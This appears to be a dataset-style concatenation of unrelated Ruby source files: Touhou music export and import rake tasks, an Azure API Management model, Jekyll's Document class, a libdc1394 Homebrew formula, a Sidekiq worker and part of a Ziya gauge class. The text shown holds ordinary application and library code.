spotify_album = album.spotify_album
spotify_album_id = spotify_album&.spotify_id
spotify_album_name = spotify_album&.name
album.tracks.sort_by(&:isrc).each do |track|
isrc = track.isrc
apple_music_track = track.apple_music_track(album)
spotify_track = track.spotify_track(album)
track_number = apple_music_track&.track_number || spotify_track&.track_number
apple_music_track_id = apple_music_track&.apple_music_id
apple_music_track_name = apple_music_track&.name
spotify_track_id = spotify_track&.spotify_id
spotify_track_name = spotify_track&.name
original_songs = track.original_songs.map(&:title).join('/')
# 原曲の紐付けがまだの楽曲を出力する場合、コメントをオフにする
# next if original_songs.present?
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{spotify_album_id}\t#{spotify_track_id}\t#{spotify_album_name}\t#{spotify_track_name}\t#{apple_music_album_id}\t#{apple_music_track_id}\t#{apple_music_album_name}\t#{apple_music_track_name}\t#{original_songs}")
end
end
end
end
desc 'Touhou music file export'
task touhou_music: :environment do
File.open('tmp/touhou_music.tsv', 'w') do |f|
f.puts("jan\tisrc\tno\tcircle\tspotify_album_artist_name\tspotify_album_name\tspotify_artist_name\tspotify_track_name\tspotify_album_url\tspotify_track_url\tapple_music_album_artist_name\tapple_music_album_name\tapple_music_artist_name\tapple_music_track_name\tapple_music_album_url\tapple_music_track_url")
Album.includes(:circles, :apple_music_album, :spotify_album, tracks: %i[apple_music_tracks spotify_tracks]).order(jan_code: :asc).each do |album|
jan = album.jan_code
circle = album.circles&.map{_1.name}&.join(' / ')
apple_music_album_url = album.apple_music_album&.url
apple_music_album_artist_name = album.apple_music_album&.artist_name
apple_music_album_name = album.apple_music_album&.name
spotify_album_url = album.spotify_album&.url
spotify_album_artist_name = album.spotify_album&.artist_name
spotify_album_name = album.spotify_album&.name
album.tracks.sort_by(&:isrc).each do |track|
isrc = track.isrc
apple_music_track = track.apple_music_tracks&.find { _1.album == album }
spotify_track = track.spotify_tracks&.find { _1.album == album }
track_number = apple_music_track&.track_number || spotify_track&.track_number
apple_music_artist_name = apple_music_track&.artist_name
apple_music_track_url = apple_music_track&.url
apple_music_track_name = apple_music_track&.name
spotify_artist_name = spotify_track&.artist_name
spotify_track_url = spotify_track&.url
spotify_track_name = spotify_track&.name
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{circle}\t#{spotify_album_artist_name}\t#{spotify_album_name}\t#{spotify_artist_name}\t#{spotify_track_name}\t#{spotify_album_url}\t#{spotify_track_url}\t#{apple_music_album_artist_name}\t#{apple_music_album_name}\t#{apple_music_artist_name}\t#{apple_music_track_name}\t#{apple_music_album_url}\t#{apple_music_track_url}")
end
end
end
end
desc 'Touhou music album only file export'
task touhou_music_album_only: :environment do
File.open('tmp/touhou_music_album_only.tsv', 'w') do |f|
f.puts("jan\tcircle\talbum_name\tspotify_album_url\tapple_music_album_url")
Album.includes(:circles, :apple_music_album, :spotify_album).order(jan_code: :asc).each do |album|
jan = album.jan_code
circle = album.circles&.map{_1.name}&.join(' / ')
apple_music_album_url = album.apple_music_album&.url
apple_music_album_name = album.apple_music_album&.name
spotify_album_url = album.spotify_album&.url
spotify_album_name = album.spotify_album&.name
f.puts("#{jan}\t#{circle}\t#{spotify_album_name || apple_music_album_name}\t#{spotify_album_url}\t#{apple_music_album_url}")
end
end
end
desc 'Spotify touhou music file export'
task spotify: :environment do
File.open('tmp/spotify_touhou_music.tsv', 'w') do |f|
f.puts("JAN\tISRC\tトラック番号\tアルバム名\t楽曲名\tアルバムURL\t楽曲URL")
SpotifyAlbum.includes(:album, spotify_tracks: :track).order(:release_date).each do |album|
jan = album.jan_code
album_name = album.name
album_url = album.url
album.spotify_tracks.each do |track|
isrc = track.isrc
track_name = track.name
track_number = track.track_number
track_url = track.url
f.puts("#{jan}\t#{isrc}\t#{track_number}\t#{album_name}\t#{track_name}\t#{album_url}\t#{track_url}")
end
end
end
end
desc 'Output albums and songs as JSON for Algolia'
task for_algolia: :environment do
File.open('tmp/touhou_music_spotify_for_algolia.json', 'w') do |file|
albums = Album.eager_load(spotify_tracks: { track: { original_songs: :original } })
file.puts(JSON.pretty_generate(SpotifyAlbumsToAlgoliaPresenter.new(albums).as_json))
end
File.open('tmp/touhou_music_apple_music_for_algolia.json', 'w') do |file|
albums = Album.eager_load(apple_music_tracks: { track: { original_songs: :original } })
file.puts(JSON.pretty_generate(AppleMusicAlbumsToAlgoliaPresenter.new(albums).as_json))
end
end
desc 'Output files for random_touhou_music'
task to_random_touhou_music: :environment do
apple_music_songs = []
AppleMusicAlbum.includes(apple_music_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).each do |album|
album.apple_music_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
apple_music_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_apple.json', 'w') do |f|
f.puts JSON.pretty_generate(apple_music_songs)
end
apple_music_tsa_songs = []
albums = AppleMusicAlbum.includes(album: :circles, apple_music_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).where(circles: { name: '上海アリス幻樂団' })
albums.each do |album|
album.apple_music_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
apple_music_tsa_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_apple_tsa.json', 'w') do |f|
f.puts JSON.pretty_generate(apple_music_tsa_songs)
end
spotify_songs = []
SpotifyAlbum.includes(spotify_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).each do |album|
album.spotify_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
spotify_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_spotify.json', 'w') do |f|
f.puts JSON.pretty_generate(spotify_songs)
end
spotify_tsa_songs = []
albums = SpotifyAlbum.includes(album: :circles, spotify_tracks: :track).is_touhou.order(release_date: :asc, id: :asc).where(circles: { name: '上海アリス幻樂団' })
albums.each do |album|
album.spotify_tracks.sort_by(&:track_number).each do |track|
next unless track.is_touhou
track_name = track.name
collection_name = album.name
url = track.url
spotify_tsa_songs.push({ title: track_name, collection_name: collection_name, url: url })
end
end
File.open('tmp/touhou_music_song_spotify_tsa.json', 'w') do |f|
f.puts JSON.pretty_generate(spotify_tsa_songs)
end
end
end
namespace :import do
desc 'Touhou music with original songs file import'
task touhou_music_with_original_songs: :environment do
songs = CSV.table('tmp/touhou_music_with_original_songs.tsv', col_sep: "\t", converters: nil, liberal_parsing: true)
songs.each do |song|
jan = song[:jan]
isrc = song[:isrc]
original_songs = song[:original_songs]
track = Track.find_by(jan_code: jan, isrc: isrc)
if track && original_songs
original_song_list = OriginalSong.where(title: original_songs.split('/'), is_duplicate: false)
track.original_songs = original_song_list
end
end
end
desc 'GitHub fetch Touhou music with original songs file import'
task fetch_touhou_music_with_original_songs: :environment do
url = 'https://raw.githubusercontent.com/shiroemons/touhou_streaming_with_original_songs/main/touhou_music_with_original_songs.tsv'
token = ENV['GITHUB_TOKEN']
if token.present?
headers = { 'Authorization' => "token #{token}" }
response = Faraday.get(url, nil, headers)
songs = CSV.new(response.body, col_sep: "\t", converters: nil, liberal_parsing: true, encoding: 'UTF-8', headers: true)
songs = songs.read
songs.inspect
max_songs = songs.size
songs.each.with_index(1) do |song, song_count|
jan = song['jan']
isrc = song['isrc']
original_songs = song['original_songs']
track = Track.find_by(jan_code: jan, isrc: isrc)
if track && original_songs
original_song_list = OriginalSong.where(title: original_songs.split('/'), is_duplicate: false)
track.original_songs = original_song_list
end
print "\r東方楽曲: #{song_count}/#{max_songs} Progress: #{(song_count * 100.0 / max_songs).round(1)}%"
end
else
puts 'GITHUB_TOKEN を設定してください。'
end
end
end
desc '原曲情報を見て is_touhouフラグを変更する'
task change_is_touhou_flag: :environment do
# Trackのis_touhouフラグを変更
Track.includes(:original_songs).each do |track|
original_songs = track.original_songs
is_touhou = original_songs.all? { _1.title != 'オリジナル' } && !original_songs.all? { _1.title == 'その他' }
track.update(is_touhou: is_touhou) if track.is_touhou != is_touhou
end
# Albumのis_touhouフラグを変更
Album.includes(:tracks).each do |album|
# トラック内にis_touhouがtrueがあれば、そのアルバムはis_touhouはtrueとする
is_touhou = album.tracks.map(&:is_touhou).any?
album.update!(is_touhou: is_touhou) if album.is_touhou != is_touhou
end
end
desc 'アルバムにサークルを紐付ける'
task associate_album_with_circle: :environment do
Album.missing_circles.eager_load(:spotify_album).each do |album|
artist_name = album&.spotify_album&.artist_name
artist_name = artist_name&.sub(%r{\AZUN / }, '')
artists = artist_name&.split(' / ')
artists = artists&.map { Circle::SPOTIFY_ARTIST_TO_CIRCLE[_1].presence || _1 }&.flatten
artists&.uniq&.each do |artist|
circle = Circle.find_by(name: artist)
album.circles.push(circle) if circle.present?
end
next unless album.circles.size.zero?
artist = Circle::JAN_TO_CIRCLE[album.jan_code]
circle = Circle.find_by(name: artist)
album.circles.push(circle) if circle.present?
end
end
end
| 46.230769 | 377 | 0.682989 |
ab7e4268d0c69b7dbbe159ecb632db1886edafdf | 10,185 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2016_07_07
module Models
#
# Report data.
#
class ReportRecordContract
include MsRestAzure
# @return [String] Name depending on report endpoint specifies product,
# API, operation or developer name.
attr_accessor :name
# @return [DateTime] Start of aggregation period. The date conforms to
# the following format: `yyyy-MM-ddTHH:mm:ssZ` as specified by the ISO
# 8601 standard.
#
attr_accessor :timestamp
# @return [Integer] Length of aggregation period.
attr_accessor :interval
# @return [String] Country to which this record data is related.
attr_accessor :country
# @return [String] Country region to which this record data is related.
attr_accessor :region
# @return [String] Zip code to which this record data is related.
attr_accessor :zip
# @return [String] User identifier path. /users/{userId}
attr_accessor :user_id
# @return [String] Product identifier path. /products/{productId}
attr_accessor :product_id
# @return [String] API identifier path. /apis/{apiId}
attr_accessor :api_id
# @return [String] Operation identifier path.
# /apis/{apiId}/operations/{operationId}
attr_accessor :operation_id
# @return [String] API region identifier.
attr_accessor :api_region
# @return [String] Subscription identifier path.
# /subscriptions/{subscriptionId}
attr_accessor :subscription_id
# @return [Integer] Number of successful calls.
attr_accessor :call_count_success
# @return [Integer] Number of calls blocked due to invalid credentials.
attr_accessor :call_count_blocked
# @return [Integer] Number of calls failed due to proxy or backend
# errors.
attr_accessor :call_count_failed
# @return [Integer] Number of other calls.
attr_accessor :call_count_other
# @return [Integer] Total number of calls.
attr_accessor :call_count_total
# @return [Integer] Bandwidth consumed.
attr_accessor :bandwidth
# @return [Integer] Number of times when content was served from cache
# policy.
attr_accessor :cache_hit_count
# @return [Integer] Number of times content was fetched from backend.
attr_accessor :cache_miss_count
# @return [Float] Average time it took to process request.
attr_accessor :api_time_avg
# @return [Float] Minimum time it took to process request.
attr_accessor :api_time_min
# @return [Float] Maximum time it took to process request.
attr_accessor :api_time_max
# @return [Float] Average time it took to process request on backend.
attr_accessor :service_time_avg
# @return [Float] Minimum time it took to process request on backend.
attr_accessor :service_time_min
# @return [Float] Maximum time it took to process request on backend.
attr_accessor :service_time_max
#
# Mapper for ReportRecordContract class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ReportRecordContract',
type: {
name: 'Composite',
class_name: 'ReportRecordContract',
model_properties: {
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
},
timestamp: {
client_side_validation: true,
required: false,
serialized_name: 'timestamp',
type: {
name: 'DateTime'
}
},
interval: {
client_side_validation: true,
required: false,
serialized_name: 'interval',
type: {
name: 'Number'
}
},
country: {
client_side_validation: true,
required: false,
serialized_name: 'country',
type: {
name: 'String'
}
},
region: {
client_side_validation: true,
required: false,
serialized_name: 'region',
type: {
name: 'String'
}
},
zip: {
client_side_validation: true,
required: false,
serialized_name: 'zip',
type: {
name: 'String'
}
},
user_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'userId',
type: {
name: 'String'
}
},
product_id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'productId',
type: {
name: 'String'
}
},
api_id: {
client_side_validation: true,
required: false,
serialized_name: 'apiId',
type: {
name: 'String'
}
},
operation_id: {
client_side_validation: true,
required: false,
serialized_name: 'operationId',
type: {
name: 'String'
}
},
api_region: {
client_side_validation: true,
required: false,
serialized_name: 'apiRegion',
type: {
name: 'String'
}
},
subscription_id: {
client_side_validation: true,
required: false,
serialized_name: 'subscriptionId',
type: {
name: 'String'
}
},
call_count_success: {
client_side_validation: true,
required: false,
serialized_name: 'callCountSuccess',
type: {
name: 'Number'
}
},
call_count_blocked: {
client_side_validation: true,
required: false,
serialized_name: 'callCountBlocked',
type: {
name: 'Number'
}
},
call_count_failed: {
client_side_validation: true,
required: false,
serialized_name: 'callCountFailed',
type: {
name: 'Number'
}
},
call_count_other: {
client_side_validation: true,
required: false,
serialized_name: 'callCountOther',
type: {
name: 'Number'
}
},
call_count_total: {
client_side_validation: true,
required: false,
serialized_name: 'callCountTotal',
type: {
name: 'Number'
}
},
bandwidth: {
client_side_validation: true,
required: false,
serialized_name: 'bandwidth',
type: {
name: 'Number'
}
},
cache_hit_count: {
client_side_validation: true,
required: false,
serialized_name: 'cacheHitCount',
type: {
name: 'Number'
}
},
cache_miss_count: {
client_side_validation: true,
required: false,
serialized_name: 'cacheMissCount',
type: {
name: 'Number'
}
},
api_time_avg: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeAvg',
type: {
name: 'Double'
}
},
api_time_min: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeMin',
type: {
name: 'Double'
}
},
api_time_max: {
client_side_validation: true,
required: false,
serialized_name: 'apiTimeMax',
type: {
name: 'Double'
}
},
service_time_avg: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeAvg',
type: {
name: 'Double'
}
},
service_time_min: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeMin',
type: {
name: 'Double'
}
},
service_time_max: {
client_side_validation: true,
required: false,
serialized_name: 'serviceTimeMax',
type: {
name: 'Double'
}
}
}
}
}
end
end
end
end
| 30.770393 | 77 | 0.473245 |
180f54fb67b65c5d5b7a89169473a8ce6feb8591 | 14,925 | # encoding: UTF-8
module Jekyll
class Document
include Comparable
extend Forwardable
attr_reader :path, :site, :extname, :collection
attr_accessor :content, :output
def_delegator :self, :read_post_data, :post_read
YAML_FRONT_MATTER_REGEXP = %r!\A(---\s*\n.*?\n?)^((---|\.\.\.)\s*$\n?)!m
DATELESS_FILENAME_MATCHER = %r!^(?:.+/)*(.*)(\.[^.]+)$!
DATE_FILENAME_MATCHER = %r!^(?:.+/)*(\d{2,4}-\d{1,2}-\d{1,2})-(.*)(\.[^.]+)$!
# Create a new Document.
#
# path - the path to the file
# relations - a hash with keys :site and :collection, the values of which
# are the Jekyll::Site and Jekyll::Collection to which this
# Document belong.
#
# Returns nothing.
def initialize(path, relations = {})
@site = relations[:site]
@path = path
@extname = File.extname(path)
@collection = relations[:collection]
@has_yaml_header = nil
if draft?
categories_from_path("_drafts")
else
categories_from_path(collection.relative_directory)
end
data.default_proc = proc do |_, key|
site.frontmatter_defaults.find(relative_path, collection.label, key)
end
trigger_hooks(:post_init)
end
# Fetch the Document's data.
#
# Returns a Hash containing the data. An empty hash is returned if
# no data was read.
def data
@data ||= {}
end
# Merge some data in with this document's data.
#
# Returns the merged data.
def merge_data!(other, source: "YAML front matter")
merge_categories!(other)
Utils.deep_merge_hashes!(data, other)
merge_date!(source)
data
end
def date
data["date"] ||= (draft? ? source_file_mtime : site.time)
end
def source_file_mtime
@source_file_mtime ||= File.mtime(path)
end
# Returns whether the document is a draft. This is only the case if
# the document is in the 'posts' collection but in a different
# directory than '_posts'.
#
# Returns whether the document is a draft.
def draft?
data["draft"] ||= relative_path.index(collection.relative_directory).nil? &&
collection.label == "posts"
end
# The path to the document, relative to the site source.
#
# Returns a String path which represents the relative path
# from the site source to this document
def relative_path
@relative_path ||= Pathutil.new(path).relative_path_from(site.source).to_s
end
# The output extension of the document.
#
# Returns the output extension
def output_ext
Jekyll::Renderer.new(site, self).output_ext
end
# The base filename of the document, without the file extname.
#
# Returns the basename without the file extname.
def basename_without_ext
@basename_without_ext ||= File.basename(path, ".*")
end
# The base filename of the document.
#
# Returns the base filename of the document.
def basename
@basename ||= File.basename(path)
end
# Produces a "cleaned" relative path.
# The "cleaned" relative path is the relative path without the extname
# and with the collection's directory removed as well.
# This method is useful when building the URL of the document.
#
# Examples:
# When relative_path is "_methods/site/generate.md":
# cleaned_relative_path
# # => "/site/generate"
#
# Returns the cleaned relative path of the document.
def cleaned_relative_path
@cleaned_relative_path ||=
relative_path[0..-extname.length - 1].sub(collection.relative_directory, "")
end
# Determine whether the document is a YAML file.
#
# Returns true if the extname is either .yml or .yaml, false otherwise.
def yaml_file?
%w(.yaml .yml).include?(extname)
end
# Determine whether the document is an asset file.
# Asset files include CoffeeScript files and Sass/SCSS files.
#
# Returns true if the extname belongs to the set of extensions
# that asset files use.
def asset_file?
sass_file? || coffeescript_file?
end
# Determine whether the document is a Sass file.
#
# Returns true if extname == .sass or .scss, false otherwise.
def sass_file?
%w(.sass .scss).include?(extname)
end
# Determine whether the document is a CoffeeScript file.
#
# Returns true if extname == .coffee, false otherwise.
def coffeescript_file?
extname == ".coffee"
end
# Determine whether the file should be rendered with Liquid.
#
# Returns false if the document is either an asset file or a yaml file,
# true otherwise.
def render_with_liquid?
!(coffeescript_file? || yaml_file?)
end
# Determine whether the file should be rendered with a layout.
#
# Returns true if the Front Matter specifies that `layout` is set to `none`.
def no_layout?
data["layout"] == "none"
end
# Determine whether the file should be placed into layouts.
#
# Returns false if the document is set to `layouts: none`, or is either an
# asset file or a yaml file. Returns true otherwise.
def place_in_layout?
!(asset_file? || yaml_file? || no_layout?)
end
# The URL template where the document would be accessible.
#
# Returns the URL template for the document.
def url_template
collection.url_template
end
# Construct a Hash of key-value pairs which contain a mapping between
# a key in the URL template and the corresponding value for this document.
#
# Returns the Hash of key-value pairs for replacement in the URL.
def url_placeholders
@url_placeholders ||= Drops::UrlDrop.new(self)
end
# The permalink for this Document.
# Permalink is set via the data Hash.
#
# Returns the permalink or nil if no permalink was set in the data.
def permalink
data && data.is_a?(Hash) && data["permalink"]
end
# The computed URL for the document. See `Jekyll::URL#to_s` for more details.
#
# Returns the computed URL for the document.
def url
@url ||= URL.new({
:template => url_template,
:placeholders => url_placeholders,
:permalink => permalink,
}).to_s
end
def [](key)
data[key]
end
# The full path to the output file.
#
# base_directory - the base path of the output directory
#
# Returns the full path to the output file of this document.
def destination(base_directory)
dest = site.in_dest_dir(base_directory)
path = site.in_dest_dir(dest, URL.unescape_path(url))
if url.end_with? "/"
path = File.join(path, "index.html")
else
path << output_ext unless path.end_with? output_ext
end
path
end
# Write the generated Document file to the destination directory.
#
# dest - The String path to the destination dir.
#
# Returns nothing.
def write(dest)
path = destination(dest)
FileUtils.mkdir_p(File.dirname(path))
File.write(path, output, :mode => "wb")
trigger_hooks(:post_write)
end
# Whether the file is published or not, as indicated in YAML front-matter
#
# Returns 'false' if the 'published' key is specified in the
# YAML front-matter and is 'false'. Otherwise returns 'true'.
def published?
!(data.key?("published") && data["published"] == false)
end
# Read in the file and assign the content and data based on the file contents.
# Merge the frontmatter of the file with the frontmatter default
# values
#
# Returns nothing.
def read(opts = {})
Jekyll.logger.debug "Reading:", relative_path
if yaml_file?
@data = SafeYAML.load_file(path)
else
begin
merge_defaults
read_content(opts)
read_post_data
rescue => e
handle_read_error(e)
end
end
end
# Create a Liquid-understandable version of this Document.
#
# Returns a Hash representing this Document's data.
def to_liquid
@to_liquid ||= Drops::DocumentDrop.new(self)
end
# The inspect string for this document.
# Includes the relative path and the collection label.
#
# Returns the inspect string for this document.
def inspect
"#<Jekyll::Document #{relative_path} collection=#{collection.label}>"
end
# The string representation for this document.
#
# Returns the content of the document
def to_s
output || content || "NO CONTENT"
end
# Compare this document against another document.
# Comparison is a comparison between the 2 paths of the documents.
#
# Returns -1, 0, +1 or nil depending on whether this doc's path is less than,
# equal or greater than the other doc's path. See String#<=> for more details.
def <=>(other)
return nil unless other.respond_to?(:data)
cmp = data["date"] <=> other.data["date"]
cmp = path <=> other.path if cmp.nil? || cmp.zero?
cmp
end
# Determine whether this document should be written.
# Based on the Collection to which it belongs.
#
# True if the document has a collection and if that collection's #write?
# method returns true, otherwise false.
def write?
collection && collection.write?
end
# The Document excerpt_separator, from the YAML Front-Matter or site
# default excerpt_separator value
#
# Returns the document excerpt_separator
def excerpt_separator
(data["excerpt_separator"] || site.config["excerpt_separator"]).to_s
end
# Whether to generate an excerpt
#
# Returns true if the excerpt separator is configured.
def generate_excerpt?
!excerpt_separator.empty?
end
def next_doc
pos = collection.docs.index { |post| post.equal?(self) }
if pos && pos < collection.docs.length - 1
collection.docs[pos + 1]
end
end
def previous_doc
pos = collection.docs.index { |post| post.equal?(self) }
if pos && pos > 0
collection.docs[pos - 1]
end
end
def trigger_hooks(hook_name, *args)
Jekyll::Hooks.trigger collection.label.to_sym, hook_name, self, *args if collection
Jekyll::Hooks.trigger :documents, hook_name, self, *args
end
def id
@id ||= File.join(File.dirname(url), (data["slug"] || basename_without_ext).to_s)
end
# Calculate related posts.
#
# Returns an Array of related Posts.
def related_posts
Jekyll::RelatedPosts.new(self).build
end
# Override of normal respond_to? to match method_missing's logic for
# looking in @data.
def respond_to?(method, include_private = false)
data.key?(method.to_s) || super
end
# Override of method_missing to check in @data for the key.
def method_missing(method, *args, &blck)
if data.key?(method.to_s)
Jekyll::Deprecator.deprecation_message "Document##{method} is now a key "\
"in the #data hash."
Jekyll::Deprecator.deprecation_message "Called by #{caller(0..0)}."
data[method.to_s]
else
super
end
end
def respond_to_missing?(method, *)
data.key?(method.to_s) || super
end
# Add superdirectories of the special_dir to categories.
# In the case of es/_posts, 'es' is added as a category.
# In the case of _posts/es, 'es' is NOT added as a category.
#
# Returns nothing.
def categories_from_path(special_dir)
superdirs = relative_path.sub(%r!#{special_dir}(.*)!, "")
.split(File::SEPARATOR)
.reject do |c|
c.empty? || c == special_dir || c == basename
end
merge_data!({ "categories" => superdirs }, :source => "file path")
end
def populate_categories
merge_data!({
"categories" => (
Array(data["categories"]) + Utils.pluralized_array_from_hash(
data,
"category",
"categories"
)
).map(&:to_s).flatten.uniq,
})
end
def populate_tags
merge_data!({
"tags" => Utils.pluralized_array_from_hash(data, "tag", "tags").flatten,
})
end
private
def merge_categories!(other)
if other.key?("categories") && !other["categories"].nil?
if other["categories"].is_a?(String)
other["categories"] = other["categories"].split(%r!\s+!).map(&:strip)
end
other["categories"] = (data["categories"] || []) | other["categories"]
end
end
private
def merge_date!(source)
if data.key?("date") && !data["date"].is_a?(Time)
data["date"] = Utils.parse_date(
data["date"].to_s,
"Document '#{relative_path}' does not have a valid date in the #{source}."
)
end
end
private
def merge_defaults
defaults = @site.frontmatter_defaults.all(
relative_path,
collection.label.to_sym
)
merge_data!(defaults, :source => "front matter defaults") unless defaults.empty?
end
private
def read_content(opts)
self.content = File.read(path, Utils.merged_file_read_opts(site, opts))
if content =~ YAML_FRONT_MATTER_REGEXP
self.content = $POSTMATCH
data_file = SafeYAML.load(Regexp.last_match(1))
merge_data!(data_file, :source => "YAML front matter") if data_file
end
end
private
def read_post_data
populate_title
populate_categories
populate_tags
generate_excerpt
end
private
def handle_read_error(error)
if error.is_a? SyntaxError
Jekyll.logger.error "Error:", "YAML Exception reading #{path}: #{error.message}"
else
Jekyll.logger.error "Error:", "could not read file #{path}: #{error.message}"
end
if site.config["strict_front_matter"] || error.is_a?(Jekyll::Errors::FatalException)
raise error
end
end
private
def populate_title
if relative_path =~ DATE_FILENAME_MATCHER
date, slug, ext = Regexp.last_match.captures
modify_date(date)
elsif relative_path =~ DATELESS_FILENAME_MATCHER
slug, ext = Regexp.last_match.captures
end
# Try to ensure the user gets a title.
data["title"] ||= Utils.titleize_slug(slug)
# Only overwrite slug & ext if they aren't specified.
data["slug"] ||= slug
data["ext"] ||= ext
end
private
def modify_date(date)
if !data["date"] || data["date"].to_i == site.time.to_i
merge_data!({ "date" => date }, :source => "filename")
end
end
private
def generate_excerpt
if generate_excerpt?
data["excerpt"] ||= Jekyll::Excerpt.new(self)
end
end
end
end
| 29.379921 | 90 | 0.629012 |
263f51123fba4287457b3ee2829bc951e4f1d323 | 2,102 | class Libdc1394 < Formula
desc "Provides API for IEEE 1394 cameras"
homepage "https://damien.douxchamps.net/ieee1394/libdc1394/"
license "LGPL-2.1"
stable do
url "https://downloads.sourceforge.net/project/libdc1394/libdc1394-2/2.2.6/libdc1394-2.2.6.tar.gz"
sha256 "2b905fc9aa4eec6bdcf6a2ae5f5ba021232739f5be047dec8fe8dd6049c10fed"
# fix issue due to bug in OSX Firewire stack
# libdc1394 author comments here:
# https://permalink.gmane.org/gmane.comp.multimedia.libdc1394.devel/517
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/b8275aa07f/libdc1394/capture.patch"
sha256 "6e3675b7fb1711c5d7634a76d723ff25e2f7ae73cd1fbf3c4e49ba8e5dcf6c39"
end
end
bottle do
sha256 cellar: :any, arm64_big_sur: "8af168268139e714a725ab1d4384a34ef092a3e50e081baba66fdf583fef3711"
sha256 cellar: :any, big_sur: "7eef59a97b33666b144d68181b081eba93c4c23c58f159a67684d2ed2d043080"
sha256 cellar: :any, catalina: "57080908a5da9abb2c0d83d4ad25450a507de8140a812112d9e5751f4004e4d0"
sha256 cellar: :any, mojave: "6cf02c5500f83fa2ccd1ff9b880f44f9652d68b0e90a2345d6c62fb92a988f0a"
sha256 cellar: :any, high_sierra: "536cbd34a43886d63a3dba41e7877ed63ad0fbe1a5e21cde499bd2c9e1e37e52"
sha256 cellar: :any, sierra: "ff1d7c6b07f21d8cd485574b10091eb21c2316390a7d4cfa84d29cccce8097e6"
sha256 cellar: :any, x86_64_linux: "23d63fc6cb173b5a3028d1a94a62db68f3c0eac53bbd707ff4419e96abc12937"
end
head do
url "https://git.code.sf.net/p/libdc1394/code.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
depends_on "libusb"
end
depends_on "sdl"
def install
Dir.chdir("libdc1394") if build.head?
system "autoreconf", "-i", "-s" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-examples",
"--disable-sdltest"
system "make", "install"
end
end
| 42.04 | 106 | 0.724072 |
878f647d46f91c18f588af91dc7e8bee0b21efab | 439 | class CreateEgotterFollowerWorker
include Sidekiq::Worker
sidekiq_options queue: 'creating_high', retry: 0, backtrace: false
def perform(user_id)
user = User.find(user_id)
unless EgotterFollower.exists?(uid: user.uid)
EgotterFollower.create!(uid: user.uid, screen_name: user.screen_name)
end
rescue ActiveRecord::RecordNotUnique => e
rescue => e
logger.warn "#{e.class}: #{e.message} #{user_id}"
end
end
| 29.266667 | 75 | 0.719818 |
e2e851194abf89943c44eea36156cfc81e228dd5 | 6,132 | module Ziya::Gauges
class Base
include Ziya::Helpers::BaseHelper
attr_accessor :license, :design_id
attr_reader :type, :components
attr_reader :options
def initialize( license, design_id )
@license = license
@design_id = design_id
# load up associated helper
loaded = load_helper( Ziya.helpers_dir ) if Ziya.helpers_dir
Ziya.logger.warn( ">>> ZiYa -- no helper for gauge `#{design_id}" ) unless loaded
# init defaults
@options = default_options
end
# -------------------------------------------------------------------------
# provides for overiding basic functionality
#
# <tt>gauge_color</tt>:: Legend color
# <tt>legend_color</tt>:: Gauge color
def set_preferences( opts={} )
options.merge!( opts )
end
# -------------------------------------------------------------------------
# render gauge to xml
def to_xml
render_xml
end
# =========================================================================
protected
# inject update behavior
def render_extra_components
if options[:url]
Ziya::Gauges::Support::Update.new(
:url => options[:url],
:retry => options[:retry] || 0,
:timeout => options[:timeout] || 30,
:delay_type => options[:delay_type] || 1,
:delay => options[:delay] || 30 ).flatten( @xml )
end
end
# -------------------------------------------------------------------------
# setup thermometer default options
def default_options
{
:x => 20,
:y => 20,
:gauge_color => "ff0000",
:legend_color => "cc0000",
}
end
# =========================================================================
private
# retrieve bundled design directory
def bundled_designs_dir
Ziya.path( %w[gauges designs] )
end
# -----------------------------------------------------------------------
# Load up ERB style helpers
def load_helper( helper_dir )
Dir.foreach(helper_dir) do |helper_file|
unless helper_file =~ /^(#{design_id}_helper).rb$/ or helper_file =~ /^(base_helper).rb$/
next
end
Ziya.logger.info( ">>> ZiYa loading custom helper `#{$1}" )
# BOZO !! This will only work in rails ??
if defined? RAILS_ROOT
require_dependency File.join(helper_dir, $1)
else
require File.join(helper_dir, $1)
end
helper_module_name = "Ziya::" + $1.gsub(/(^|_)(.)/) { $2.upcase }
# helper_module_name = $1.to_s.gsub(/\/(.?)/) { "::" + $1.upcase }.gsub(/(^|_)(.)/) { $2.upcase }
Ziya.logger.debug( "Include module #{helper_module_name}")
Ziya::Gauges::Base.class_eval("include #{helper_module_name}")
true
end
false
end
# -----------------------------------------------------------------------
# merge components with user overrides
def merge_comps( original, override )
override.each do |k,v|
if original.has_key? k
original[k] = v
else
original << [k,v]
end
end
end
# -----------------------------------------------------------------------
# renders design components
def render_components
# First check bundled design dir for std design
std_design = inflate( self, bundled_designs_dir, design_id )
# Now check for user overrides
usr_design = inflate( self, Ziya.designs_dir, design_id )
design = usr_design
if std_design and usr_design
design = std_design
merge_comps( design.components, usr_design.components )
# design.components.merge!( usr_design.components )
elsif std_design
design = std_design
end
# Ziya.logger.debug "!!!! Design\n#{design.to_yaml}"
# flatten components to xml
design.components.each do |name, value|
# Ziya.logger.debug "Processing #{name}"
